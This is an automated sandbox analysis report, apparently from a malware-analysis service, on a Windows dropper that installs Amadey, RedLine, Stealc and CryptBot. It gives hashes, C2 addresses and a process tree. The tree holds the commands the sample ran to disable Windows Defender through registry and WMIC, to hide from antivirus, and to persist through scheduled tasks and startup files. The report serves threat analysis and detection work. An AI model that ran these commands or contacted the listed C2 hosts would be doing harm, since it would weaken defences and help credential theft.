Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    06-09-2024 14:41

General

  • Target

    682b91eca5a79a9809c60ff23edf1c17e188e6281245a2f897536b94066d67c9.exe

  • Size

    1.8MB

  • MD5

    62c23555b68461e77d8bf8c4834da53e

  • SHA1

    4c174d03fba7ac32ef961662dbd80c4cb1f8f55b

  • SHA256

    682b91eca5a79a9809c60ff23edf1c17e188e6281245a2f897536b94066d67c9

  • SHA512

    72013017799a071f30de5dab8fc02c1c0612d3d77868d03fb84d4dcf8a393d7dea9985219956bc826b8541dce5bc2b9f2e37792f1b745d91c926fc3f81dd404b

  • SSDEEP

    49152:1EYUuOLII9kssHTMdZilGySWxf30Y3HESEOqmx:rgVS3odglGyTxkTOqU

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

cryptbot

C2

analforeverlovyu.top

sevtv17ht.top

fivev5ht.top

Attributes
  • url_path

    /v1/upload.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • ZharkBot

    ZharkBot is a botnet written C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 11 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 45 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 16 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 5 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 6 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3320
      • C:\Users\Admin\AppData\Local\Temp\682b91eca5a79a9809c60ff23edf1c17e188e6281245a2f897536b94066d67c9.exe
        "C:\Users\Admin\AppData\Local\Temp\682b91eca5a79a9809c60ff23edf1c17e188e6281245a2f897536b94066d67c9.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4000
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4584
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2996
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
                PID:3184
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1664
            • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
              "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1704
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5512
                • C:\Users\Admin\AppData\Roaming\ClB60ge8n3.exe
                  "C:\Users\Admin\AppData\Roaming\ClB60ge8n3.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3244
                • C:\Users\Admin\AppData\Roaming\h9iRvRRHLh.exe
                  "C:\Users\Admin\AppData\Roaming\h9iRvRRHLh.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5124
            • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1224
              • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:5500
                • C:\Users\Admin\AppData\Local\Temp\1000019001\joffer2.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000019001\joffer2.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  PID:5580
                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                    "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:1592
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:5704
            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:2860
            • C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe
              "C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe"
              4⤵
              • Executes dropped EXE
              • Checks processor information in registry
              PID:4536
              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3908
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4872
            • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
              "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2116
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                5⤵
                • Executes dropped EXE
                PID:2832
            • C:\Users\Admin\1000238002\Amadeus.exe
              "C:\Users\Admin\1000238002\Amadeus.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1700
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                5⤵
                  PID:6112
              • C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe
                "C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1924
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  5⤵
                    PID:4352
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    5⤵
                      PID:3080
                      • C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:5844
                        • C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
                          "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
                          7⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:2928
                      • C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:4668
                      • C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:5480
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          7⤵
                            PID:1628
                            • C:\Users\Admin\AppData\Roaming\uqCpow8ltJ.exe
                              "C:\Users\Admin\AppData\Roaming\uqCpow8ltJ.exe"
                              8⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2308
                            • C:\Users\Admin\AppData\Roaming\HtgL7BsdVJ.exe
                              "C:\Users\Admin\AppData\Roaming\HtgL7BsdVJ.exe"
                              8⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3740
                        • C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe"
                          6⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:3596
                        • C:\Users\Admin\AppData\Local\Temp\1000223001\d17c3f881d.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000223001\d17c3f881d.exe"
                          6⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5064
                        • C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
                          6⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:1052
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
                            7⤵
                              PID:5280
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist
                                8⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1364
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr /I "wrsa opssvc"
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:6064
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist
                                8⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4200
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                8⤵
                                  PID:3256
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c md 684126
                                  8⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4380
                                • C:\Windows\SysWOW64\findstr.exe
                                  findstr /V "VegetablesIndividualBindingGba" Ever
                                  8⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3312
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
                                  8⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5956
                                • C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif
                                  Intake.pif C
                                  8⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:4404
                                  • C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                                    C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                                    9⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:3672
                                • C:\Windows\SysWOW64\choice.exe
                                  choice /d y /t 5
                                  8⤵
                                    PID:2512
                              • C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe"
                                6⤵
                                • Executes dropped EXE
                                • Checks processor information in registry
                                PID:5928
                              • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:816
                                • C:\Users\Admin\AppData\Local\Temp\7zS88C3.tmp\Install.exe
                                  .\Install.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:1228
                                  • C:\Users\Admin\AppData\Local\Temp\7zS8B05.tmp\Install.exe
                                    .\Install.exe /VWTudidGON "385107" /S
                                    8⤵
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Enumerates system info in registry
                                    PID:6080
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                      9⤵
                                        PID:4028
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                          10⤵
                                          • Indirect Command Execution
                                          PID:1604
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                            11⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2068
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                              12⤵
                                                PID:5972
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                            10⤵
                                            • Indirect Command Execution
                                            PID:3912
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                              11⤵
                                                PID:3716
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                  12⤵
                                                    PID:6124
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                10⤵
                                                • Indirect Command Execution
                                                PID:5592
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                  11⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2480
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                    12⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:752
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                10⤵
                                                • Indirect Command Execution
                                                • System Location Discovery: System Language Discovery
                                                PID:3824
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                  11⤵
                                                    PID:1584
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                      12⤵
                                                        PID:4280
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                    10⤵
                                                    • Indirect Command Execution
                                                    PID:1636
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      11⤵
                                                        PID:5224
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                          12⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5704
                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                            13⤵
                                                              PID:5980
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                      9⤵
                                                      • Indirect Command Execution
                                                      PID:776
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                        10⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1820
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                          11⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:6136
                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            12⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5904
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "bacJTkyfUyRkSoZsHL" /SC once /ST 14:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8B05.tmp\Install.exe\" Nh /OOdidXZm 385107 /S" /V1 /F
                                                      9⤵
                                                      • Drops file in Windows directory
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:2428
                                              • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:2540
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 508
                                                  7⤵
                                                  • Program crash
                                                  PID:2584
                                              • C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                PID:2996
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
                                              5⤵
                                                PID:5204
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
                                                  6⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:4076
                                            • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3040
                                            • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5188
                                            • C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1904
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4396
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4832
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
                                          2⤵
                                          • Drops startup file
                                          PID:4780
                                      • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                        C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                        1⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4928
                                      • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                        C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:5932
                                      • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                        C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3452
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2540 -ip 2540
                                        1⤵
                                          PID:3972
                                        • C:\Users\Admin\AppData\Local\Temp\7zS8B05.tmp\Install.exe
